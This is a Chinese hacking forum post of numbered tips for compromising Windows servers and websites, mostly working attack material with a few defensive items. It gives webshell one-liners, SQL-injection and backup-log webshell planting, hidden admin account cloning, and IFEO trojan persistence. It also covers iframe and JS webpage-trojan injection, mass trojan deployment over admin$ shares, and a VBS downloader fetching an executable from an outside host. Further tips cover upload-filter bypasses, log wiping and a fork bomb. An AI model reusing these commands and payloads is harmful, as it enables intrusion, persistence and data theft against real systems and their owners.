找回密码
 立即注册
查看: 2922|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,/ ?- m0 f! d6 m9 }8 b
cacls C:\windows\system32 /G hqw20:R
; Y/ u: s7 a# O" E- V思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入& n7 _/ L) w3 X, o( o2 C5 s
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
, `6 u8 r3 n- j! m  J. b6 I
0 n0 ?0 ^" V5 R2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
/ @5 A& I/ Z! q( q' y; u7 |. X
0 u2 O' U  P5 Y& a3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
# C& E) K+ t- \! i1 i+ s- R) d; N' ?, j3 a( D2 i1 J# u
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
1 s6 E; a4 M; c4 _& O! i% n( P. I+ |& _+ R! C; l
5、利用INF文件来修改注册表% M2 B5 U/ F5 {& k6 q5 ^! a; a& W: E7 f
[Version]
$ }$ ~, i8 [* U8 e; vSignature="$CHICAGO$"- Q! {; N% ~% }
[Defaultinstall]2 |, u4 k5 v9 T7 m$ H6 V6 V8 t: e
addREG=Ating
6 e  Q6 M3 z) a( A[Ating]1 O9 }+ L: O' `' q
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1") `5 K; L& F- H( R9 l9 c. }3 f
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:9 @" S) s9 |* \7 v2 A
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
! S4 T& j' |% Z其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
2 i4 Y2 V2 f( kHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU$ m. r+ t2 R2 q3 [- M; h( U! ^) E2 ?4 ?
HKEY_CURRENT_CONFIG 简写为 HKCC
3 I* h" W+ i7 Z) _3 o0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
# L2 s9 X: s% K7 Y& v+ k5 P' u"1"这里代表是写入或删除注册表键值中的具体数据
# t+ T' d) N4 {, _. w0 x6 p, @
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,3 A* q- B( a# n) Q
多了一步就是在防火墙里添加个端口,然后导出其键值% i! x; x' R# m  k
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
  @: W- V2 n+ }  r% `, y2 F
. u# ], g4 _% I! v& b7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
" G1 a0 N/ _3 I6 G% c: Y( c在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
; T, S# m: p7 h- B# @8 p7 ?/ q) q0 n# o
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
. }5 }! j1 y7 H7 k% ^. ~5 D* |. [( Y0 w0 ~% Y/ P* R/ s8 m6 T
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ `1 \. W, z9 B9 `- G- l5 \
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
9 D7 M+ a8 D3 y
# i; l5 V( n3 `2 ^! e1 b+ H10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
- Z. l9 t, A. P9 g3 f' i8 ~  o3 ^5 p; W0 R
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 p: P  h2 W4 V) l用法:xsniff –pass –hide –log pass.txt
* m* d( A6 b+ M- i. ]1 q) y7 W) K: F+ r+ |; _
12、google搜索的艺术& Q1 ~+ I- X! L$ Z! w+ |" I" O
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
, f7 R: `# ]- W# Q" M3 u  e) V或“字符串的语法错误”可以找到很多sql注入漏洞。
) J3 X8 M1 U, ~7 c6 w- Y0 C; Z* k% c, c+ v0 V0 f7 b7 J% ?
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
, U/ I2 o$ ]; L( h& B9 t$ L4 A! x# r4 v+ ^$ e
14、cmd中输入 nc –vv –l –p 19876 q3 k! c- y$ g; D
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
$ F: S4 l  a& V1 b0 ~/ |) F8 w
  S' X8 M$ e$ w+ }15、制作T++木马,先写个ating.hta文件,内容为
5 M/ H6 t5 t3 w1 c/ C4 U<script language="VBScript">9 Y" [: m) r# H3 G; r. ?0 h
set wshshell=createobject ("wscript.shell" )8 B, t* I6 v9 j3 d7 Q! e/ Y4 p0 M& Z
a=wshshell.run("你马的名称",1)3 L& H: N; ]  ^  `1 v" Y" c* E
window.close% L" y2 a- v. |! D
</script>% t5 @/ v9 p$ V
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。% `/ ~6 Z3 Z6 q4 ?+ m
; B7 |! L& d! R4 D
16、搜索栏里输入) `* R) a% j$ z( h2 s, w( S
关键字%'and 1=1 and '%'='4 K0 T* ~8 M  Y2 V
关键字%'and 1=2 and '%'='
+ a  Q$ z& R8 L5 Z% a6 ^, w8 H# r/ i比较不同处 可以作为注入的特征字符
2 T: E8 }; B' F6 o- w, c- X8 t  n5 F% [. b  v" H/ L/ W
17、挂马代码<html>5 u& M- I5 u/ h! b# M+ j9 v
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>5 b# G5 F4 [* k' I6 H
</html>6 C! T3 o- ]9 G% k0 Z

% A8 W% H5 K7 G$ p18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,# d! C9 v; J  Z* m& \8 p( S
net localgroup administrators还是可以看出Guest是管理员来。
9 S5 ~0 f1 z' u  I8 R/ H( R; G" @1 y+ P3 r' ^+ r7 @
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- m; O7 \3 @  j3 f2 z9 G2 }) A
用法: 安装: instsrv.exe 服务名称 路径- Q" I9 \' _& a  M4 s2 g& @
卸载: instsrv.exe 服务名称 REMOVE# H2 |; r7 S% c: V
7 A- `2 ]8 \  D: V
6 c! Y2 O7 J6 c' w
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉$ n7 |+ E: s8 W# e0 ?; |# V9 Y- s
不能注入时要第一时间想到%5c暴库。4 i. g! w! r, N. R! I& {. ?4 T
6 ]8 k$ _  p5 Q; O) N6 H- W$ U
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
* t9 ~, N+ n/ L/ Y% P  C
0 y' y8 V4 H3 d+ E% Z3 T3 S23、缺少xp_cmdshell时) F- [6 I9 P& m* }" \( Z& J
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'5 `9 a$ H/ y$ I  Y
假如恢复不成功,可以尝试直接加用户(针对开3389的)
& i0 u' j  g# w. ?" w' S6 E: Cdeclare @o int# _& ^( E. c4 I" _4 c+ `! M
exec sp_oacreate 'wscript.shell',@o out
# A( K$ c2 y8 h; texec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员( j4 s# R9 V# C2 V1 Z! s8 g
; x. H4 C2 g. A
24.批量种植木马.bat2 c/ r! e9 H& N0 c
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
3 Q! S( ?  a% ^/ e+ yfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
- q( r; G6 |  J" F# V! H* G扫描地址.txt里每个主机名一行 用\\开头
: e$ P% F2 I+ T9 J0 B/ I  |: d
1 ^3 g, u& ^( @7 |% O5 I" Z) O25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。5 V5 t. w" b3 t

: D, z( E$ S; B- P- b26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.5 m# r2 N: R6 F/ _" |
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.% t* _. @4 m4 D  G+ i- v$ t0 u
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
8 a. P$ J! P! L0 h& b' D) ^/ P2 R+ p! ]9 K6 t* h( n1 R: a
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
9 S- U7 y/ K6 X1 V然后用#clear logg和#clear line vty *删除日志
4 h8 A- {# v5 X" u5 o9 ]- K7 D; T6 U1 k9 r' C
28、电脑坏了省去重新安装系统的方法( R# X* |' `; A- Y' k" K5 R
纯dos下执行,
0 W# W: T" J. H/ [& Vxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config3 g* U" w, B5 A$ d, V3 D/ l
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config. J. A. Y- f2 C  {

, r1 o0 ^& l4 B8 W$ x9 `- n. I29、解决TCP/IP筛选 在注册表里有三处,分别是:
) ^! S4 O3 b: z( g3 I: K9 ?2 vHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip4 Q- A  G8 Z3 W, a; d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( W2 X+ ^" P! O1 C' j. m  x
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 o0 i# {5 ?& S( ^0 [' Z2 C
分别用% o4 J. s: p# o" P/ r0 I: ~, j
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# {4 k0 o# F: u/ l# x( q# Yregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip/ X* {  b9 [% Z
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 e1 }7 S# b: q# d
命令来导出注册表项
- C2 J2 U& g; u4 |然后把三个文件里的EnableSecurityFilters"=dword:00000001,
; t6 X" M6 n/ V+ u" L改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
& B& d( q) U9 s0 x$ z+ s) {& \regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
# [4 r1 a" o9 D6 E5 I# l4 ~
; W4 `3 C2 a$ y  @30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 _, i! Y+ O/ z/ _/ ?
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
6 ~! |" t  d2 T* ~/ G# q% W  ~$ y
5 [# Z3 ]- \- d' d8 t3 ]31、全手工打造开3389工具
( |+ A& q; L7 \打开记事本,编辑内容如下:
# p* k* d! Y5 d8 \3 T' l4 secho [Components] > c:\sql
0 h( g9 x+ h8 y% b, techo TSEnable = on >> c:\sql7 t4 t- H7 @( n8 |! Q  q
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 J1 A" @6 m- e/ X5 G编辑好后存为BAT文件,上传至肉鸡,执行
2 m4 }% [" f$ J; S) ?
7 |8 M- z% K* S% K32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马9 A# K# @- `+ [1 W% D' q+ O6 x

! x' h8 T1 n: ], _33、让服务器重启
5 Y2 ^( W$ z$ }8 \写个bat死循环:
6 R' s+ a" z. }) r@echo off  g: `+ ?' N/ [! i0 v* A. J
:loop1
: ~' w! e2 r& Tcls
- P+ @9 z6 u' wstart cmd.exe
  m" T9 d: K% _; h! qgoto loop1# y% ~5 D& t+ l: o7 F7 ?3 Y
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启+ B; @2 t) E* E  k* H, l% b9 V2 y
/ P+ B. F; Q6 }8 n+ p7 w2 s
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
" S+ V- |$ t: o' F2 \/ D' A2 _@echo off
% H$ e6 C" B, ddate /t >c:/3389.txt3 C2 G7 m- z& _- b
time /t >>c:/3389.txt
" b+ Z! z# A, s- [5 M$ Z) Eattrib +s +h c:/3389.bat
" L: u: M' T" p& m) S/ Xattrib +s +h c:/3389.txt% Y6 J" J0 q/ B: \2 u) I  Y5 E
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt, T% |- o( I0 K6 Q& |, L
并保存为3389.bat9 t, _# [) m) `1 B+ d7 ]3 |
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号6 C) P8 C8 e$ \1 d
, i  d3 E; m2 d$ p" @  l
35、有时候提不了权限的话,试试这个命令,在命令行里输入:) A. L$ g0 U4 |) W
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
- S) I5 ^& H, s9 o! t输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
* I  h; t$ A) G+ c- G5 ?% q$ H+ {" Z: |
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
% ^; i* M4 L6 w8 g2 v, k: z% W/ ?2 y8 cecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址8 T6 g8 O+ T  k1 P( V$ U: t  u
echo 你的FTP账号 >>c:\1.bat //输入账号
/ s8 h6 g. C+ a1 techo 你的FTP密码 >>c:\1.bat //输入密码
; T: i- _% m. S0 Q3 {0 A4 N) \4 vecho bin >>c:\1.bat //登入
' z9 E( t0 q# ?( D& H: ]; U5 Qecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么) p  B$ ?! F8 J) Y6 U" Z
echo bye >>c:\1.bat //退出
9 `' g$ s- i4 w  z+ A4 \然后执行ftp -s:c:\1.bat即可
- i( s, g3 W/ f; X5 z3 N- ^6 O# n% Z& S! J! V
37、修改注册表开3389两法
: H; Y2 Y# f5 M* t(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
% @. o' ^+ b2 i, d' n" n9 _* pecho Windows Registry Editor Version 5.00 >>3389.reg: k4 s2 K. }- V6 W) B% v  D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg4 f9 l7 {7 [6 E- F
echo "Enabled"="0" >>3389.reg
* y3 F( b, n# a1 f/ w& Recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
4 d7 G' G4 F# S. K6 u3 I8 NNT\CurrentVersion\Winlogon] >>3389.reg
  W$ c6 z" B( [echo "ShutdownWithoutLogon"="0" >>3389.reg+ }" S; B+ S# _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]* d& i. x: t) ^
>>3389.reg; U0 C" F6 K& j8 v8 `# A/ b
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
2 F+ J( t8 h( m6 d6 recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]  g5 w. v! W# x8 F
>>3389.reg& c5 M9 r  K) u5 b5 z$ |
echo "TSEnabled"=dword:00000001 >>3389.reg2 t  Y. n. P* I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! j9 E: |) R2 {5 X/ O) t
echo "Start"=dword:00000002 >>3389.reg
9 ~  O; k3 w0 |( x5 ?, Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]2 \6 j! O4 R; I5 Q$ u  w  X
>>3389.reg! j% [; J# p" j5 \6 S$ e( z
echo "Start"=dword:00000002 >>3389.reg
) R! K2 R4 P4 W$ U) L, x* r. Decho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
; w% s3 h$ H/ @: kecho "Hotkey"="1" >>3389.reg# d( L# [# p* `+ ~. v& m- Q/ v8 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 Y2 w7 n) Z' S/ q' H1 ^
Server\Wds\rdpwd\Tds\tcp] >>3389.reg% s5 v. |" f& ~6 ~, s
echo "PortNumber"=dword:00000D3D >>3389.reg8 ~4 e( }) |  Z7 k% V6 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ s. B/ B. k, c' ^" D. S0 P( v' sServer\WinStations\RDP-Tcp] >>3389.reg5 O4 f; r( b! n% Q+ k
echo "PortNumber"=dword:00000D3D >>3389.reg$ u$ p( w3 K, v( u% v' g
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。* y5 J1 Z0 ~1 r0 l: I" w
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
8 w; a7 @' `. M因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
$ }( C: s% U& y$ x( ]# ^(2)winxp和win2003终端开启
1 t* C% d# w* M" s: I9 D- U2 L用以下ECHO代码写一个REG文件:' B# S9 v" l2 G5 M
echo Windows Registry Editor Version 5.00>>3389.reg
, |; H9 X! p) S" Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* G2 h! i' K4 M3 s. B. l
Server]>>3389.reg
) C% {: |. U9 u* ]2 Jecho "fDenyTSConnections"=dword:00000000>>3389.reg) S3 [3 I& {& S: a  N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- j/ M% T2 R6 R- z- FServer\Wds\rdpwd\Tds\tcp]>>3389.reg
6 L8 v% L' u; x4 x# Vecho "PortNumber"=dword:00000d3d>>3389.reg
& v' `" D4 D4 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 b; t/ s6 s3 M; Y6 c0 KServer\WinStations\RDP-Tcp]>>3389.reg# J) W* j+ k: p: K% n1 a. w7 E
echo "PortNumber"=dword:00000d3d>>3389.reg: \) y; ?/ @7 x8 y7 B: w
然后regedit /s 3389.reg del 3389.reg
/ p4 w* q6 C; q# v1 N7 X/ TXP下不论开终端还是改终端端口都不需重启
# e  x" F& {* u5 k0 O/ y0 z1 L% @% f
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
6 i3 |2 P* K3 C& }8 |: ^; i2 Z' V用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'0 \3 A+ f8 J2 f; L6 h
. ~  D/ C/ o' h  r9 w: y7 ~
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
( J# X( [( a* ~2 A- B) q9 ?(1)数据库文件名应复杂并要有特殊字符  t4 z3 X" k$ q
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源  g# t4 P' z4 \2 ]; D5 I; L3 D0 }
将conn.asp文档中的
& S! F& U. _' tDBPath = Server.MapPath("数据库.mdb")
' A0 p, d9 T0 G; s$ t: Mconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
4 _; r$ A4 B8 E* N  T4 t/ C8 T* Q% z) N9 k/ x) j
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
- q, b  }: b7 ^( P(3)不放在WEB目录里
# U% M( g" f2 D+ C; U2 s3 y( f" c, S. K' V! F1 G! z1 K
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
" v4 U9 ?( B1 E6 z- x& a3 P可以写两个bat文件/ M5 ]( L: z" u: @1 j' \5 D
@echo off
9 Y5 O" `3 a2 o5 M+ Z+ E8 w; _; x@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe8 Q# D* _% w4 T6 Y, S: ~
@del c:\winnt\system32\query.exe6 R, ^4 \; L; V! O( G& A' U2 e
@del %SYSTEMROOT%\system32\dllcache\query.exe
  z. [. r5 Z. f% c@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的8 P& A  I# K+ e9 r" B

0 @. b+ [1 [& f1 L/ U) a@echo off
( j3 V0 Y- o) I7 U@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe1 _6 V; \% f& }9 J: e5 ~
@del c:\winnt\system32\tsadmin.exe
6 Q# H1 f: D& m  G& Q@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex( g6 e5 T2 `* V
, J2 h5 e4 I0 u0 ^  c
41、映射对方盘符
; l' I1 N* {, ^9 M. Otelnet到他的机器上,
4 a( `! o/ ]! O7 s* K! snet share 查看有没有默认共享 如果没有,那么就接着运行
4 c, [) n3 T4 S, N; |( X. ynet share c$=c:8 ^8 R! e+ [! w* m9 E4 I8 q3 ?( x
net share现在有c$
( c8 f/ E4 G& ^在自己的机器上运行7 W3 l2 a4 X/ S( @* V$ D  j9 }3 f
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K1 j1 Z0 Y) b' C9 j; S4 A3 a0 u! @- x

7 q0 i3 T; k. a42、一些很有用的老知识8 E( x$ ~$ y" I4 C1 Q0 F3 G  n0 j
type c:\boot.ini ( 查看系统版本 )
7 E( P9 Q4 L4 M  P; h, Nnet start (查看已经启动的服务)
" E* o& s* K& P  o. A  Nquery user ( 查看当前终端连接 ); W: k& S9 ?5 E1 C- r9 `
net user ( 查看当前用户 ), q' @5 W# w( g& M( M
net user 用户 密码/add ( 建立账号 )
6 E0 n0 @9 T; Y+ W+ Q8 v# Xnet localgroup administrators 用户 /add (提升某用户为管理员)) B) ~4 [6 [: S  Z2 u" W
ipconfig -all ( 查看IP什么的 )
& W+ r$ o& F0 z; H3 }* pnetstat -an ( 查看当前网络状态 )# C8 ?( d0 P* Q, s! U& Q- v* r
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)6 S9 j: V+ G% d
克隆时Administrator对应1F4
$ R# L4 X; z" g8 G0 c# s  G( |9 N# Kguest对应1F53 u- y$ J8 G+ w: f
tsinternetuser对应3E83 F4 i5 E' l" Q+ i" G" n  {
) h/ V/ |6 D: X, M+ b$ y. S0 B9 ^
43、如果对方没开3389,但是装了Remote Administrator Service9 T1 w) `8 D" A  ^
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接* F! L6 Z- V5 z; a. [
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息" g- l/ I' `7 b3 d9 t* Y, _
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
* b' c- K  m) p( J, |- E, ?
* W& d' I  D  a# ~& A44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 H6 c+ \. M; U- b+ t本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
. C5 W. J& P# V$ A* f, P+ T- L& u1 g4 y. P' ?# w8 s
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
) ]  W. U* v2 Cecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
: Q9 c2 }: w9 ]0 t& m$ y5 l^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =4 f- }: \8 ^7 I. Y
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ C' D+ g$ y. H1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs, ^. c; h" b# C5 U$ Y
(这是完整的一句话,其中没有换行符)
, h6 A1 J. ?/ e- L$ r$ B  W* o然后下载:
8 d; Z+ ^' x/ i- Jcscript down.vbs http://www.hack520.org/hack.exe hack.exe
9 d8 L% O( P) m2 z
* E& ?: X7 |- [9 }" D4 R  j$ a# `( Y46、一句话木马成功依赖于两个条件:
/ K  l5 b$ b# T& Y( ~0 e- a1、服务端没有禁止adodb.Stream或FSO组件
" ?- c% i2 Q8 A0 h4 X/ z" n/ F6 r2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
8 u4 Y7 N5 y! ^$ [/ b. m9 F2 f7 C* {/ {' r) b
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
) a* M: n, C: J6 ]! P( s;alter database utsz set RECOVERY FULL--
& R( }9 v0 k% u& H;create table cmd (a image)--! H4 e& ?) l5 k0 p5 ?1 U$ A( b
;backup log utsz to disk = 'D:\cmd' with init--1 s. C/ \2 q9 {8 ~& J7 h& ]8 |
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
; L8 q9 N6 |: _1 o& c, Q8 o;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--/ K1 H8 s& Y6 U% [
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
+ s8 K: ^- J" G+ C* g8 Q6 d. q3 X3 p4 d, b& f% J7 }/ z. d& X
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:8 O: P- F, d' d$ }2 s% x0 y7 `1 P* X
; x: O0 T. j3 m
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options7 V8 Z2 P$ n2 C* q$ F- U
所有会话用 'all'。
! e" q: }- B$ Q-s sessionid 列出会话的信息。& S! I7 w0 R) P* s
-k sessionid 终止会话。
6 ^) g( d0 s5 ?1 [* L-m sessionid 发送消息到会话。
$ B7 Z/ i, M+ E- M
  l  B% [" q# b8 M4 @0 y3 \config 配置 telnet 服务器参数。
5 O* m9 i2 b( N% q& y8 z" n. _- R! s: S( d$ C9 `( D: m
common_options 为:
( X! l7 q* y% b' P4 `3 S3 B-u user 指定要使用其凭据的用户6 A% U7 A" B7 X+ e: k3 N$ |" Y) X
-p password 用户密码' W9 L0 q) c; u6 Z7 A' B

8 D# I2 K2 C: N7 l+ b  {config_options 为:* ^% v6 g' e! j' K1 l6 i
dom = domain 设定用户的默认域
5 p, x0 K) |7 Q$ x3 s4 k" w7 xctrlakeymap = yes|no 设定 ALT 键的映射- T" P6 B( V9 X1 Q$ I
timeout = hh:mm:ss 设定空闲会话超时值
" |! @5 v# ?. vtimeoutactive = yes|no 启用空闲会话。$ L0 \" ^  ~  M5 O' @/ y
maxfail = attempts 设定断开前失败的登录企图数。4 q# [# C" l1 l& f$ X# o
maxconn = connections 设定最大连接数。
: X$ A' e/ w3 B" }& C0 t2 ]5 O1 pport = number 设定 telnet 端口。
( n9 u4 k: a: n7 e- R' M; ^. O! csec = [+/-]NTLM [+/-]passwd, `% K, Q8 Z4 o6 U7 ~
设定身份验证机构1 w" l) i- A$ ?% R+ b
fname = file 指定审计文件名。/ D8 Y5 U' c+ L2 r* w4 Z, l" w
fsize = size 指定审计文件的最大尺寸(MB)。9 b  ?: |$ R. T* g
mode = console|stream 指定操作模式。
( O+ T- A% \* h* Dauditlocation = eventlog|file|both+ _! }4 S# Z+ O0 ?0 ?. l6 V; t
指定记录地点! v7 y& g, V. Z% X2 }% I2 o) {
audit = [+/-]user [+/-]fail [+/-]admin
: \! K/ c$ ]. t2 V) E5 A# q7 l' e; D; b. f0 U% g; V3 g
49、例如:在IE上访问:
  H' g# q7 p! G. E; Y6 z( wwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' M( H0 P7 D2 Hhack.txt里面的代码是:6 m0 M, R3 h8 {
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, y8 N7 }: \( x把这个hack.txt发到你空间就可以了!: u, e* b" N9 J
这个可以利用来做网马哦!- d7 ^8 w( }' k; o, [; _

( E: ]% j$ l& U2 J; Q, S4 Y50、autorun的病毒可以通过手动限制!9 g( E( s4 N- K2 P8 C" ~& V3 V- L
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!% S( e- I+ [" A+ k4 O. w
2,打开盘符用右键打开!切忌双击盘符~/ P6 {8 a4 W) d6 Y* p& z/ j- D+ q
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
. H$ |. [: `5 G$ k* H) c4 d- h1 c
51、log备份时的一句话木马:, s" ]* ?! V6 F" K
a).<%%25Execute(request("go"))%%25>
  h, d! @. u& Y. vb).<%Execute(request("go"))%>
